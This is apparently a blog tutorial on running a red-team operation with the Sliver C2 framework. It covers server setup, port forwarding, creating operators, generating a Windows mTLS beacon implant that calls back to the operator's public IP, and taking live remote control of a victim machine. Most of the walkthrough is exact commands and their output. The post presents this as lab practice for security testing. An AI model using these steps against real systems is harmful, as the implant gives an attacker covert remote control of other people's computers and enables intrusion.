Introduction
In the world of cybersecurity, Red Team operations serve as one of the most effective ways to identify and test an organization's defenses. By simulating real-world attack scenarios, Red Teams help organizations understand their vulnerabilities before malicious actors can exploit them. In this blog post, we dive deep into the Sliver C2 framework — a highly capable and flexible tool that empowers Red Team professionals to simulate sophisticated cyber-attacks with ease.
Sliver, a modern and open-source Command and Control (C2) framework, is designed for efficient and stealthy penetration testing, making it an invaluable asset for both offensive security practitioners and organizations looking to enhance their defensive posture. This blog post will walk you through a complete Red Team operation utilizing Sliver C2, demonstrating how it can be leveraged for everything from initial access to lateral movement and post-exploitation activities.
We'll cover the fundamentals of setting up Sliver C2, exploring its advanced features, and providing a detailed walkthrough of a simulated attack scenario. Whether you're a seasoned Red Team operator or just getting started, this post will help you harness the full potential of Sliver in your offensive security arsenal. Let's dive into the world of Red Team operations with Sliver C2.
Setting up Sliver C2
For this project, I will be hosting the C2 Server at home rather than a combination of Virtual Private Server, proxy chains and tunneling which would the ideal scenario considering the bad operation security of using one’s personal public IP as in this example… so kids, never try this at home !
First, we spin up a Linux server and set the IP to static, my preference is kali as it is built for this exact purpose (hacking).
Note: Feel free to google how to do the above as this is out of scope
Once this is done, we must use the binary available on BishopFox github: https://github.com/BishopFox/sliver/releases
chmod +x sliver-server_linux
./sliver-server_linux
output below:
┌──(maine㉿offsec)-[~/Downloads]
└─$ ./sliver-server_linux
Sliver Copyright (C) 2022 Bishop Fox
This program comes with ABSOLUTELY NO WARRANTY; for details type 'licenses'.
This is free software, and you are welcome to redistribute it
under certain conditions; type 'licenses' for details.
Unpacking assets ...
[*] Loaded 21 aliases from disk
[*] Loaded 141 extension(s) from disk
██████ ██▓ ██▓ ██▒ █▓▓█████ ██▀███
▒██ ▒ ▓██▒ ▓██▒▓██░ █▒▓█ ▀ ▓██ ▒ ██▒
░ ▓██▄ ▒██░ ▒██▒ ▓██ █▒░▒███ ▓██ ░▄█ ▒
▒ ██▒▒██░ ░██░ ▒██ █░░▒▓█ ▄ ▒██▀▀█▄
▒██████▒▒░██████▒░██░ ▒▀█░ ░▒████▒░██▓ ▒██▒
▒ ▒▓▒ ▒ ░░ ▒░▓ ░░▓ ░ ▐░ ░░ ▒░ ░░ ▒▓ ░▒▓░
░ ░▒ ░ ░░ ░ ▒ ░ ▒ ░ ░ ░░ ░ ░ ░ ░▒ ░ ▒░
░ ░ ░ ░ ░ ▒ ░ ░░ ░ ░░ ░
░ ░ ░ ░ ░ ░ ░ ░
All hackers gain dash
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options
[*] Check for updates with the 'update' command
[server] sliver >
It is important that we use the server, so we can create different operators later. if your terminal, does not show [server] sliver , then you got the wrong one. it will still work, but you will not have the multiplayer mode feature.
Alternative, we can enter sliver-server in your terminal, then enter “y” for yes.
Next, we should setup the port forwarding. As we all use different ones, be sure to google how to do port forwarding with your own router.
I have setup <myPublicIP>:4040 to 192.168.1.101:4040. To make sure it works, we can listen on port 4040 locally on 192.168.1.101, which is our kali machine, the one hosting Sliver Server C2.
Note: feel free to google how to do the above as this is out of scope
Tip: Check your own public IP by googling, what’s my ip
we enter the following command in our kali machine:
nc -lvnp 4040
From any other device, even outside our network, we can scan our public ip if the port 4040 is open.
nmap -A -p4040 -vv <mypublicip>
we should get some reading on the attacker machine as validation that the port forwarding is working properly.
Do the same for port 31337 and another port of your choice, this latter port will be for the stagers, at a later stage
Hooray !!! we celebrate a bit ….
Now we know that, our payload and virus can communicate back to the C2 Server. Let’s now, setup an operator, so we can access our server remotely…
go ahead and enter multiplayer in the sliver server terminal
[server] sliver > multiplayer
[*] Multiplayer mode enabled!
Now we create an operator,
[server] sliver > new-operator -l <mypublicIp> -n maine
Share the cfg file to the right person.
Tip: Feel free to consult the help menu of every commands, with help <command> or <command> —help
Though, the whole operation can be conducted from the sliver-server, we also want to take advantage that we can connect from anywhere in the world to our C2 server.
From the operator terminal, repeat the step for setting up Sliver-server , for Sliver-client this time, alternatively, we can just type sliver-client in our terminal and enter “y” for yes. This will install the client.
To use our newly created access, to the Sliver C2 server, we enter the following commands:
sliver-client import maine.cfg
OR
./sliver-client import maine.cfg
OR
sliver import maine.cfg
Tip: Feel free to consult the help menu with sliver-client -h or sliver -h
so I did the following:
┌──(maine㉿offsec)-[~/Downloads]
└─$ sliver-client import maine.cfg
2025/01/03 21:40:35 Saved new client config to: /home/maine/.sliver-client/configs/maine.cfg
we now can, enter again the command: sliver or sliver-client or ./sliver-client. Select the correct username for the correct IP.
output:
.------..------..------..------..------..------.
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\\: || :/\\: || (\\/) || :(): || (\\/) || :(): |
| :\\/: || (__) || :\\/: || ()() || :\\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
`------'`------'`------'`------'`------'`------'
All hackers gain reinforce
[*] Server v1.5.42 - kali
[*] Client v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options
[*] Check for updates with the 'update' command
sliver >
Tada !!! we can now access our Sliver C2 Server from anywhere in the world.
***** we celebrate a bit*****
First Beacon - Case of Window 10
The Server set up is done , we should test now, if an implant can get back to us. For this, we will have a windows 10 as a victim.
We disable all anti-virus and tampering. let’s generate a quick implant and send it over to the victim.
sliver > generate beacon --mtls <mypublicip>:4040 --os windows --arch amd64 --format exe --seconds 5 --jitter 3
[*] Generating new windows/amd64 beacon implant binary (5s)
[*] Symbol obfuscation is enabled
[*] Build completed in 26s
[*] Implant saved to /home/maine/Downloads/RICH_BRUSH.exe
where:
- --seconds: beacon interval seconds (default: 60)
- --jitter: beacon interval jitter in seconds (default: 30)
- --mtls: mutual TLS
It’s worth noting that, the payload seems to be compiled on the server rather that the client, with that in mind, we should make sure our server is powerful enough to host different operators activity without fail.
we start a listener:
sliver > mtls -l 4040
[*] Starting mTLS listener ...
[*] Successfully started job #2
The victim execute the payload, and BOOOMMMM !!! here we go, we got an Beacon working !!!! A call back !!! a Shelll !!!!!!!!
[*] Beacon c46b2b6e RICH_BRUSH - IP:PORT (DESKTOP-DUQ8TTD) - windows/amd64 - Fri, 03 Jan 2025 22:05:16 SAST
sliver >
celebrate, celebrate celebrate !!!!!!!!!!!!!!!!
Interact with a Beacon
we now have access to the victim computer remotely over the internet. we can list our beacons by entering beacons
sliver > beacons
ID Name Tasks Transport Remote Address Hostname Username Operating System Locale Last Check-In Next Check-In
========== ============ ======= =========== ==================== ================= ========== ================== ======== ============================================ ============================================
c46b2b6e RICH_BRUSH 0/0 mtls sniiiiiiiiiiiiiiip DESKTOP-DUQ8TTD me windows/amd64 en-US Fri Jan 3 22:08:50 SAST 2025 (13m20s ago) Fri Jan 3 22:08:55 SAST 2025 (13m15s ago)
sliver >
we then use the command, use <ID> to interact with the beacon
sliver > use c46b2b6e
[*] Active beacon RICH_BRUSH (c46b2b6e-f408-4829-8899-64472c646b57)
sliver (RICH_BRUSH) >
sliver (RICH_BRUSH) > info
Beacon ID: c46b2b6e-f408-4829-8899-64472c646b57
Name: RICH_BRUSH
Hostname: DESKTOP-DUQ8TTD
UUID: 52384d56-7437-0384-131a-4e4d1ede2a45
Username: DESKTOP-DUQ8TTD\\me
UID: S-1-5-21-2574036656-4060413577-2053307646-1001
GID: S-1-5-21-2574036656-4060413577-2053307646-513
PID: 1332
OS: windows
Version: 10 build 19045 x86_64
Locale: en-US
Arch: amd64
Active C2: mtls://Snip:4040
Remote Address: snip:25685
Proxy URL:
Interval: 5s
Jitter: 3s
First Contact: Fri Jan 3 22:05:38 SAST 2025 (27m1s ago)
Last Checkin: Fri Jan 3 22:08:50 SAST 2025 (23m49s ago)
Next Checkin: Fri Jan 3 22:08:55 SAST 2025 (23m44s ago)
we notice that the entered command do take a while before getting an output, this behaviour is normal, that ‘s what we get on beacon mode. To move from beacon made to live session, where we do not have any delay, we enter the command
sliver (RICH_BRUSH) > interactive
[*] Using beacon's active C2 endpoint: mtls://SNIP:4040
[*] Tasked beacon RICH_BRUSH (75f51ba0)
[*] Session 1f07c18c RICH_BRUSH - SNIP:30780 (DESKTOP-DUQ8TTD) - windows/amd64 - Fri, 03 Jan 2025 22:46:36 SAST
sliver (RICH_BRUSH) > background
[*] Background ...
a session has been created, now we check sessions as follow:
sliver > sessions
ID Name Transport Remote Address Hostname Username Operating System Locale Last Message Health
========== ============ =========== ==================== ================= ========== ================== ======== ======================================= =========
1f07c18c RICH_BRUSH mtls Sniiiiiiiiiipppppp DESKTOP-DUQ8TTD me windows/amd64 en-US Fri Jan 3 22:46:59 SAST 2025 (in 7s) [ALIVE]
Interact with the session, just like what we did with the beacon, enter the command, use <session ID>
sliver > use 1f07c18c
[*] Active session RICH_BRUSH (1f07c18c-aa49-42a6-9d8c-3a57050493eb)
sliver (RICH_BRUSH) >
we notice right away that RICH_BRUSH turned red, indicating us that we are in sessions mode. now we have a live shell, instant output response…
enter close to end the session
sliver (RICH_BRUSH) > close
[!] Lost session 1f07c18c RICH_BRUSH - (DESKTOP-DUQ8TTD) - windows/amd64 - Fri, 03 Jan 2025 22:51:23 SAST
[!] Active session disconnected
sliver >
Do not worry, we close the session, not the beacon :)
Unlike Colbat strike or even Havoc, Sliver C2 does not cover evasion , on the other hand, we can generate shellcodes from sliver and make our own payload which then we can code to evade anti-virus, EDRs, and introducing stagers on the fly. This is mainly the reason why, I did not cover payload delivery in this post, simply because evasion has to be discussed first.
That being said, next in the Sliver C2 Complete Red team operation over WAN Series, we will have a look at Anti-virus Evasion.
Feel free to comment any questions below !
